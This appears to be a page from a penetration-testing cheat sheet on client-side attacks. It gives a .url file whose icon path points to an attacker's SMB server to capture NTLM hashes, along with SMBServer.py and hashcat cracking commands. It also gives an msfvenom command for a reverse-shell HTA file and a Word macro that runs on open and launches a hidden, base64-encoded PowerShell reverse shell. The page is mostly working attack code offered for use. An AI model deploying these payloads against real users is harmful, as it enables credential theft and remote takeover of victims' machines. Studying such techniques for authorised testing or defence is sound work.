Client Side Attacks

URL Attack (Formerly SCF)

  • If there is a location a user is reading files from, like FTP or SMB, use a file like this to grab their hash with SMBServer.py or Responder once they click it. Then crack it with Hashcat.

smbserver.py share . -smb2support
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.56.128\%USERNAME%.icon
IconIndex=1

  • Create it as a .txt and save as .url before sending or putting in location for user

hashcat -m 5600 hash.txt /root/rockyou.txt --force

HTA

  • HTML Applications that will get executed by mshta.exe if user is on IE or Edge (with Edge the user has more security notifications to click through

msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f hta-psh -o shell.hta

  • Host the file with a web server or upload it in a known place where the user will open

Macro

  • Create a macro in a Word doc that will auto-launch on opening to give a reverse shell

  • Can use the previous msfvenom command to copy a powershell payload or just use revshells.com

  • Split the powershell payload as you aren't allowed the full amount of characters on a single line

str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."
n = 50
for i in range(0, len(str), n):
print "Str = Str + " + '"' + str[i:i+n] + '"'

  • Then add the payload into the macro

Sub AutoOpen()
		MyMacroName
End Sub

Sub Document_Open()
		MyMacroName
End Sub

Sub MyMacroName()
		Dim Str As String
		
		Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
		Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
		Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"
		Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"
		Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"
		Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
		...
		Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
		Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"
		Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"
		Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
		Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
		Str = Str + "QA="
		
		CreateObject("Wscript.Shell").Run Str
End Sub
PreviousFinding UsersNextPowerShell Domain Enumeration

Last updated